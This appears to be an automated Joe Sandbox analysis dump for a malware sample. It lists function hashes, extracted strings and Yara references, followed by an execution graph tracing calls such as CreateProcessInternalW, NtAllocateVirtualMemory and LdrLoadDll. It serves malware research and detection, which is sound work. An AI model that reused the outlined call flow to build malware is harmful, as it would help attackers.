                                                                                                  • Opcode ID: ca788c1081be9eb4bcbe097236bf42e3ce73106bb634ccd3a34a5343c987d662
                                                                                                  • Instruction ID: 9b1d4ce174166f452a6daf2f682350db26e503f18fde8abaf6cd1eb08649da0f
                                                                                                  • Opcode Fuzzy Hash: ca788c1081be9eb4bcbe097236bf42e3ce73106bb634ccd3a34a5343c987d662
                                                                                                  • Instruction Fuzzy Hash: B04187B5C00218BAEB20EBA4DC81FDE737CAF54704F00859DA91DA7140EBB5A749DFA1
                                                                                                  Function 0416B109 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                                  • API String ID: 0-3322591375
                                                                                                  • Opcode ID: 0991975c987812cb15c87801c29253781fa0aefc289a27140ff651190e1a4c7a
                                                                                                  • Instruction ID: 19e298710e2a22ee059cb226bd62edd9047be0e26ba96f1e9792c2edf5b44e75
                                                                                                  • Opcode Fuzzy Hash: 0991975c987812cb15c87801c29253781fa0aefc289a27140ff651190e1a4c7a
                                                                                                  • Instruction Fuzzy Hash: 5E4153B2C44218AEDF50DFA8DC84AEEB7F8BF48714F05419AE91DE7100EB75A6458B90
                                                                                                  Function 04162C19 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  • Opcode ID: 2b4273c2fbc1f91134952f2f9411d8decb2c8a611f13ac3db9aa038c91d0428c
                                                                                                  • Instruction ID: 937ce4266dbbcc79b7a694a663460f2c86d9b0a8d13adf35966330f452b792ba
                                                                                                  • Opcode Fuzzy Hash: 2b4273c2fbc1f91134952f2f9411d8decb2c8a611f13ac3db9aa038c91d0428c
                                                                                                  • Instruction Fuzzy Hash: F551D771900304ABE735EFA5DCC4BEBB7BCAF44704F00459EE5199A190E7B4B654CBA1
                                                                                                  Function 04162C0E Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  • Opcode ID: ad3aa566ea2713ace7865fb9a29f7f89f4245d7c3b9da3fdaa550dd777e59075
                                                                                                  • Instruction ID: 290b24c5ea93bab151f74e4a03e56fcdd2deb26606bf689d979ef61ca4aaefac
                                                                                                  • Opcode Fuzzy Hash: ad3aa566ea2713ace7865fb9a29f7f89f4245d7c3b9da3fdaa550dd777e59075
                                                                                                  • Instruction Fuzzy Hash: D101F1B1C00288AEDB20DFA5C4441AFBFB4FF82314F15818ED8146F200D3B65658CB90
                                                                                                  Function 0414F5B9 Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: )$F$[$\$v$y
                                                                                                  • API String ID: 0-3880085799
                                                                                                  • Opcode ID: e55fd68c5d37c0d5bc7cce5579235d44dee70a1b2ce715e85290a5128d5107b8
                                                                                                  • Instruction ID: 994fc224ff7968edf357571bbade6f816eb836ff3c8917daa08bcac59a2e2221
                                                                                                  • Opcode Fuzzy Hash: e55fd68c5d37c0d5bc7cce5579235d44dee70a1b2ce715e85290a5128d5107b8
                                                                                                  • Instruction Fuzzy Hash: 74113B10D087CEDDDB12C7BC84486AEBF714F23224F0882C9D4A52B2D2D3794206C7A6
                                                                                                  Function 04162319 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: b9516d3c2b1f5b1af00b09c2c4f43d8c30c737ffb1e76d3a876bbc58da11cd27
                                                                                                  • Instruction ID: 83248fa0772f5fdfff93e3096fa5fa17e3f800d87bba0f9d269e34671bf63fa1
                                                                                                  • Opcode Fuzzy Hash: b9516d3c2b1f5b1af00b09c2c4f43d8c30c737ffb1e76d3a876bbc58da11cd27
                                                                                                  • Instruction Fuzzy Hash: 44613CB1A00204AFDB24DFA4DC84FEFB7BDAB48704F104599E91AA7240E735FA55CB60
                                                                                                  Function 04162315 Relevance: 6.4, Strings: 5, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: ba905e2ad96b0a66535dbe7c5393088a712c5593688184c28668c8a0f587eb74
                                                                                                  • Instruction ID: c3fedc3466f37f01dbe19bde367d96b67ccec5f92a08e2e54ccaa1169a865743
                                                                                                  • Opcode Fuzzy Hash: ba905e2ad96b0a66535dbe7c5393088a712c5593688184c28668c8a0f587eb74
                                                                                                  • Instruction Fuzzy Hash: 04412CB1A00308AFDB20DFA5DC84FEFBBF9AB48704F104559E55AA7240D771AA45CB60
                                                                                                  Function 04161FA9 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 7bb3617101cca5406175c84901c4b33066c6ffff2446bf6522109dacb20c2c7a
                                                                                                  • Instruction ID: e6a5cca13b645936479ff4f4f17eef56adb1e0d7d2711a3f52046fda6acf4a19
                                                                                                  • Opcode Fuzzy Hash: 7bb3617101cca5406175c84901c4b33066c6ffff2446bf6522109dacb20c2c7a
                                                                                                  • Instruction Fuzzy Hash: 2DB10EB5A00204AFDB24DBA4CC85FEFB7B9AF88704F108558F61A97244D775AA41CB50
                                                                                                  Function 041628D9 Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 511fd4855a03e781c6fa6462118f85e26f3f394fb1c0b44ebdd95f2ff79005c0
                                                                                                  • Instruction ID: bd3ffd95ce3e0d359cffc4d20cf164e9572c8860dc1a7b94d720e9f16d275f02
                                                                                                  • Opcode Fuzzy Hash: 511fd4855a03e781c6fa6462118f85e26f3f394fb1c0b44ebdd95f2ff79005c0
                                                                                                  • Instruction Fuzzy Hash: 3F8157B2940258AAEB25EB94CDC5FEE737CEF48304F0041DAA50996140EB75BB488FA5
                                                                                                  Function 04161FA7 Relevance: 5.2, Strings: 4, Instructions: 182COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 9669fd7cb39f8805b1f4c941308e58b75c3d0edd5b6c4edf0779cb2f17608170
                                                                                                  • Instruction ID: cfb5a1d35f9b9de13c2ffe80b288e44bbbae5c2166e4ce020cb8645dad154586
                                                                                                  • Opcode Fuzzy Hash: 9669fd7cb39f8805b1f4c941308e58b75c3d0edd5b6c4edf0779cb2f17608170
                                                                                                  • Instruction Fuzzy Hash: CC610CB5A00208AFDB64DFA4CC84FEFB7B9AB88704F108559E61997244DB75AA41CB60
                                                                                                  Function 04161E66 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  • Opcode ID: 6c4c54bbd532ee080dc251cbd4461bdd6aa50d652420bc26b0ce473b6ee20ce4
                                                                                                  • Instruction ID: 297b223e91fd893be7022b1dc5ebd729d83161932be1a54ff2ac004b9daeb62e
                                                                                                  • Opcode Fuzzy Hash: 6c4c54bbd532ee080dc251cbd4461bdd6aa50d652420bc26b0ce473b6ee20ce4
                                                                                                  • Instruction Fuzzy Hash: 36415EB5911218BEEB11EBA4CC86FEF777C9F45704F004049FA14AA280E7746B15C7E6
                                                                                                  Function 04161E69 Relevance: 5.1, Strings: 4, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  • Opcode ID: 7632bb9e02393ff84ee8d8f57328fe3b348be1b6a5fe0de6b11271fdfda2c767
                                                                                                  • Instruction ID: 7f82873af9eb39194639236af8ca73ca977d0affc13f9f4ed937668b2dd299d2
                                                                                                  • Opcode Fuzzy Hash: 7632bb9e02393ff84ee8d8f57328fe3b348be1b6a5fe0de6b11271fdfda2c767
                                                                                                  • Instruction Fuzzy Hash: 03413DB5911218BEEB11EB94CC86FEF777CAF45704F004049FA14AA280E7B46B15D7E6
                                                                                                  Function 041628D4 Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 48c62572a010d0ad4ef317a213f337bd300e0f8c3e3442a8f38448fbefc0da16
                                                                                                  • Instruction ID: f28227229a3baf80d058618c149c079b1171ebca084a5af93f892ce9bbe61b8f
                                                                                                  • Opcode Fuzzy Hash: 48c62572a010d0ad4ef317a213f337bd300e0f8c3e3442a8f38448fbefc0da16
                                                                                                  • Instruction Fuzzy Hash: B24152B1D4025CAAEB21DBA4CD85FEE7378EF4C304F0081DAE51DA6141EB756B448FA5
                                                                                                  Function 0415E109 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$3$L$R
                                                                                                  • API String ID: 0-4201739200
                                                                                                  • Opcode ID: 5b77afa4fd477bc2bcb846cff573b045f4d503b8f32f175f632b5851db4802a5
                                                                                                  • Instruction ID: 2155fcbe23a3b05749ea68547cdc0684e0d91506a220c40a76ece5eed86b431a
                                                                                                  • Opcode Fuzzy Hash: 5b77afa4fd477bc2bcb846cff573b045f4d503b8f32f175f632b5851db4802a5
                                                                                                  • Instruction Fuzzy Hash: 6D3105B5D50219ABEB14DBA4DD81BEE77B8EF44304F008159E918A6240E775BB048BE5
                                                                                                  Function 0415F55E Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 97b648072a1892fbd1c1a6cd5ebea1d3bea3493c07395f1538658eff0af64a82
                                                                                                  • Instruction ID: 284bedf935faa9ffacf4d85375021fdbe88961bb74a0935c90503b9f2ca815f0
                                                                                                  • Opcode Fuzzy Hash: 97b648072a1892fbd1c1a6cd5ebea1d3bea3493c07395f1538658eff0af64a82
                                                                                                  • Instruction Fuzzy Hash: 8D1152B290021CEBDB14DF95D8C4ADEB7B9FF48314F048259E9299B205EB71E545CBA0
                                                                                                  Function 0415F569 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 8438fb926cc77468219d1d7b11b151b4ca5016e3bd39e6777a13ed185290c839
                                                                                                  • Instruction ID: df30f9dc178af8ce21cbb22100849630fd266afef4232ed1df7fc9a972d73903
                                                                                                  • Opcode Fuzzy Hash: 8438fb926cc77468219d1d7b11b151b4ca5016e3bd39e6777a13ed185290c839
                                                                                                  • Instruction Fuzzy Hash: 1F016DB290021CEBDB14DF99D8C4ADEF7B9FF08314F048259E919AB201E771E945CBA0
                                                                                                  Function 0414B9FE Relevance: 5.0, Strings: 4, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: S,en$ache$en-U$no-c
                                                                                                  • API String ID: 0-1745142266
                                                                                                  • Opcode ID: f5009ae4abfabb7ffefa97652cc27b922532a738bc7b02022a339a7295644c22
                                                                                                  • Instruction ID: 46ac4699d6ae648e1f80b3b555e9a592e5ccde0d10b5edd5d66d25c377a2b0b8
                                                                                                  • Opcode Fuzzy Hash: f5009ae4abfabb7ffefa97652cc27b922532a738bc7b02022a339a7295644c22
                                                                                                  • Instruction Fuzzy Hash: 3BF04F75D0810CFBDB14DFD4E982B9DBB38AB54700F0081E8EE189B641EA716619DBE2
                                                                                                  Function 0414BA69 Relevance: 5.0, Strings: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: =$O$ZGTM$[Q\I
                                                                                                  • API String ID: 0-2874482513
                                                                                                  • Opcode ID: 492ed94de9e442fd960b5a945faf94960ba891a37df093a3002e2e6f803537ff
                                                                                                  • Instruction ID: 593f4626c84b16b9551b7e1765ee173444cf510fbc9c22ff5440b3dcf3dd2e17
                                                                                                  • Opcode Fuzzy Hash: 492ed94de9e442fd960b5a945faf94960ba891a37df093a3002e2e6f803537ff
                                                                                                  • Instruction Fuzzy Hash: 88E065B090124C9ADB04DFF499445EEBBB8AB40300F2084A9D919AB241E775AB12C796

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.5%
                                                                                                  Dynamic/Decrypted Code Coverage:4.4%
                                                                                                  Signature Coverage:1.6%
                                                                                                  Total number of Nodes:436
                                                                                                  Total number of Limit Nodes:69
                                                                                                  execution_graph 99116 32a2eec 99121 32a7b80 99116->99121 99118 32a2f18 99122 32a7b9a 99121->99122 99126 32a2efc 99121->99126 99130 32b8910 99122->99130 99125 32b9210 NtClose 99125->99126 99126->99118 99127 32b9210 99126->99127 99128 32b922d 99127->99128 99129 32b923e NtClose 99128->99129 99129->99118 99131 32b892a 99130->99131 99134 51b35c0 LdrInitializeThunk 99131->99134 99132 32a7c6a 99132->99125 99134->99132 99135 32a7120 99136 32a7192 99135->99136 99137 32a7138 99135->99137 99137->99136 99139 32ab090 99137->99139 99140 32ab0b6 99139->99140 99141 32ab2e9 99140->99141 99166 32b9610 99140->99166 99141->99136 99143 32ab12c 99143->99141 99169 32bc500 99143->99169 99145 32ab14b 99145->99141 99146 32ab222 99145->99146 99175 32b8870 99145->99175 99148 32a5910 LdrInitializeThunk 99146->99148 99154 32ab241 99146->99154 99148->99154 99150 32ab1b6 99150->99141 99151 32ab20a 99150->99151 99152 32ab1e8 99150->99152 99179 32a5910 99150->99179 99182 32a7f00 99151->99182 99201 32b4630 LdrInitializeThunk 99152->99201 99153 32ab2d1 99156 32a7f00 LdrInitializeThunk 99153->99156 99154->99153 99186 32b83e0 99154->99186 99161 32ab2df 99156->99161 99161->99136 99162 32ab2a8 99191 32b8490 99162->99191 99164 32ab2c2 99196 32b85f0 99164->99196 99167 32b962d 99166->99167 99168 32b963e CreateProcessInternalW 99167->99168 99168->99143 99170 32bc470 99169->99170 99172 32bc4cd 99170->99172 99202 32bb3b0 99170->99202 99172->99145 99173 32bc4aa 99205 32bb2d0 99173->99205 99176 32b888d 99175->99176 99214 51b2c0a 99176->99214 99177 32ab1ad 99177->99146 99177->99150 99181 32a594e 99179->99181 99217 32b8a40 99179->99217 99181->99152 99183 32a7f03 99182->99183 99223 32b8770 99183->99223 99185 32a7f3e 99185->99136 99187 32b8457 99186->99187 99189 32b8405 99186->99189 99229 51b39b0 LdrInitializeThunk 99187->99229 99188 32b847c 99188->99162 99189->99162 99192 32b850a 99191->99192 99193 32b84b8 99191->99193 99230 51b4340 LdrInitializeThunk 99192->99230 99193->99164 99194 32b852f 99194->99164 99197 32b8667 99196->99197 99198 32b8615 99196->99198 99231 51b2fb0 LdrInitializeThunk 99197->99231 99198->99153 99199 32b868c 99199->99153 99201->99151 99208 32b9530 99202->99208 99204 32bb3cb 99204->99173 99211 32b9580 99205->99211 99207 32bb2e9 99207->99172 99209 32b954d 99208->99209 99210 32b955e RtlAllocateHeap 99209->99210 99210->99204 99212 32b959a 99211->99212 99213 32b95ab RtlFreeHeap 99212->99213 99213->99207 99215 51b2c1f LdrInitializeThunk 99214->99215 99216 51b2c11 99214->99216 99215->99177 99216->99177 99218 32b8aee 99217->99218 99219 32b8a6c 99217->99219 99222 51b2d10 LdrInitializeThunk 99218->99222 99219->99181 99220 32b8b33 99220->99181 99222->99220 99224 32b87eb 99223->99224 99226 32b8798 99223->99226 99228 51b2dd0 LdrInitializeThunk 99224->99228 99225 32b8810 99225->99185 99226->99185 99228->99225 99229->99188 99230->99194 99231->99199 99232 32aab60 99237 32aa860 99232->99237 99234 32aab6d 99251 32aa4e0 99234->99251 99236 32aab89 99238 32aa885 99237->99238 99262 32a8170 99238->99262 99241 32aa9d3 99241->99234 99243 32aa9ea 99243->99234 99244 32aa9e1 99244->99243 99246 32aaad8 99244->99246 99281 32a9f30 99244->99281 99248 32aab3d 99246->99248 99290 32aa2a0 99246->99290 99249 32bb2d0 RtlFreeHeap 99248->99249 99250 32aab44 99249->99250 99250->99234 99252 32aa4f6 99251->99252 99259 32aa501 99251->99259 99253 32bb3b0 RtlAllocateHeap 99252->99253 99253->99259 99254 32aa522 99254->99236 99255 32a8170 GetFileAttributesW 99255->99259 99256 32aa835 99257 32aa84e 99256->99257 99258 32bb2d0 RtlFreeHeap 99256->99258 99257->99236 99258->99257 99259->99254 99259->99255 99259->99256 99260 32a9f30 RtlFreeHeap 99259->99260 99261 32aa2a0 RtlFreeHeap 99259->99261 99260->99259 99261->99259 99263 32a8191 99262->99263 99264 32a8198 GetFileAttributesW 99263->99264 99265 32a81a3 99263->99265 99264->99265 99265->99241 99266 32b3200 99265->99266 99267 32b320e 99266->99267 99268 32b3215 99266->99268 99267->99244 99294 32a4330 99268->99294 99270 32b324a 99271 32b3259 99270->99271 99299 32b2cc0 LdrLoadDll 99270->99299 99272 32bb3b0 RtlAllocateHeap 99271->99272 99277 32b3404 99271->99277 99274 32b3272 99272->99274 99275 32b33fa 99274->99275 99274->99277 99278 32b328e 99274->99278 99276 32bb2d0 RtlFreeHeap 99275->99276 99275->99277 99276->99277 99277->99244 99278->99277 99279 32bb2d0 RtlFreeHeap 99278->99279 99280 32b33ee 99279->99280 99280->99244 99282 32a9f56 99281->99282 99300 32ad990 99282->99300 99284 32a9fcb 99286 32aa150 99284->99286 99287 32a9fe9 99284->99287 99285 32aa135 99285->99244 99286->99285 99288 32a9df0 RtlFreeHeap 99286->99288 99287->99285 99305 32a9df0 99287->99305 99288->99286 99291 32aa2c6 99290->99291 99292 32ad990 RtlFreeHeap 99291->99292 99293 32aa34d 99292->99293 99293->99246 99296 32a4354 99294->99296 99295 32a435b 99295->99270 99296->99295 99297 32a4390 LdrLoadDll 99296->99297 99298 32a43a7 99296->99298 99297->99298 99298->99270 99299->99271 99302 32ad9b4 99300->99302 99301 32ad9c1 99301->99284 99302->99301 99303 32bb2d0 RtlFreeHeap 99302->99303 99304 32ada04 99303->99304 99304->99284 99306 32a9e0d 99305->99306 99309 32ada20 99306->99309 99308 32a9f13 99308->99287 99310 32ada44 99309->99310 99311 32adaee 99310->99311 99312 32bb2d0 RtlFreeHeap 99310->99312 99311->99308 99312->99311 99313 32a6b60 99314 32a6b8a 99313->99314 99317 32a7d30 99314->99317 99316 32a6bb4 99318 32a7d4d 99317->99318 99324 32b8960 99318->99324 99320 32a7d9d 99321 32a7da4 99320->99321 99322 32b8a40 LdrInitializeThunk 99320->99322 99321->99316 99323 32a7dcd 99322->99323 99323->99316 99325 32b89f5 99324->99325 99327 32b8985 99324->99327 99329 51b2f30 LdrInitializeThunk 99325->99329 99326 32b8a2e 99326->99320 99327->99320 99329->99326 99330 32aff60 99331 32aff83 99330->99331 99332 32a4330 LdrLoadDll 99331->99332 99333 32affa7 99332->99333 99334 32a9a20 99335 32a9a2f 99334->99335 99336 32bb2d0 RtlFreeHeap 99335->99336 99337 32a9a36 99335->99337 99336->99337 99338 32af660 99339 32af6c4 99338->99339 99367 32a6090 99339->99367 99341 32af7fe 99342 32af7f7 99342->99341 99374 32a61a0 99342->99374 99344 32af87a 99345 32af9b2 99344->99345 99364 32af9a3 99344->99364 99378 32af440 99344->99378 99347 32b9210 NtClose 99345->99347 99349 32af9bc 99347->99349 99348 32af8b6 99348->99345 99350 32af8c1 99348->99350 99351 32bb3b0 RtlAllocateHeap 99350->99351 99352 32af8ea 99351->99352 99353 32af909 99352->99353 99354 32af8f3 99352->99354 99387 32af330 CoInitialize 99353->99387 99355 32b9210 NtClose 99354->99355 99357 32af8fd 99355->99357 99358 32af917 99390 32b8cd0 99358->99390 99360 32af992 99361 32b9210 NtClose 99360->99361 99362 32af99c 99361->99362 99363 32bb2d0 RtlFreeHeap 99362->99363 99363->99364 99365 32af935 99365->99360 99366 32b8cd0 LdrInitializeThunk 99365->99366 99366->99365 99368 32a60c3 99367->99368 99369 32a60e7 99368->99369 99394 32b8d80 99368->99394 99369->99342 99371 32a610a 99371->99369 99372 32b9210 NtClose 99371->99372 99373 32a618a 99372->99373 99373->99342 99375 32a61c5 99374->99375 99399 32b8b80 99375->99399 99379 32af45c 99378->99379 99380 32a4330 LdrLoadDll 99379->99380 99382 32af47a 99380->99382 99381 32af483 99381->99348 99382->99381 99383 32a4330 LdrLoadDll 99382->99383 99384 32af54e 99383->99384 99385 32a4330 LdrLoadDll 99384->99385 99386 32af5a8 99384->99386 99385->99386 99386->99348 99389 32af395 99387->99389 99388 32af42b CoUninitialize 99388->99358 99389->99388 99391 32b8ced 99390->99391 99404 51b2ba0 LdrInitializeThunk 99391->99404 99392 32b8d1d 99392->99365 99395 32b8d9d 99394->99395 99398 51b2ca0 LdrInitializeThunk 99395->99398 99396 32b8dc9 99396->99371 99398->99396 99400 32b8b9a 99399->99400 99403 51b2c60 LdrInitializeThunk 99400->99403 99401 32a6239 99401->99344 99403->99401 99404->99392 99405 32b8f20 99406 32b8fd1 99405->99406 99408 32b8f49 99405->99408 99407 32b8fe7 NtCreateFile 99406->99407 99409 32b5f20 99410 32b5f7a 99409->99410 99412 32b5f87 99410->99412 99413 32b3930 99410->99413 99420 32bb240 99413->99420 99415 32b3971 99416 32a4330 LdrLoadDll 99415->99416 99419 32b3a7e 99415->99419 99417 32b39b7 99416->99417 99418 32b3a00 Sleep 99417->99418 99417->99419 99418->99417 99419->99412 99423 32b9370 99420->99423 99422 32bb271 99422->99415 99424 32b93ff 99423->99424 99426 32b9395 99423->99426 99425 32b9415 NtAllocateVirtualMemory 99424->99425 99425->99422 99426->99422 99427 32b1960 99428 32b1979 99427->99428 99429 32b1a09 99428->99429 99430 32b19c4 99428->99430 99433 32b1a04 99428->99433 99431 32bb2d0 RtlFreeHeap 99430->99431 99432 32b19d4 99431->99432 99434 32bb2d0 RtlFreeHeap 99433->99434 99434->99429 99435 32b8820 99436 32b883a 99435->99436 99439 51b2df0 LdrInitializeThunk 99436->99439 99437 32b8862 99439->99437 99445 51b2ad0 LdrInitializeThunk 99446 32b86a0 99447 32b872c 99446->99447 99449 32b86c8 99446->99449 99451 51b2ee0 LdrInitializeThunk 99447->99451 99448 32b875d 99451->99448 99452 32a8627 99453 32a862a 99452->99453 99454 32a85e1 99453->99454 99456 32a6d80 LdrInitializeThunk LdrInitializeThunk 99453->99456 99456->99454 99457 32a2070 99458 32b8870 LdrInitializeThunk 99457->99458 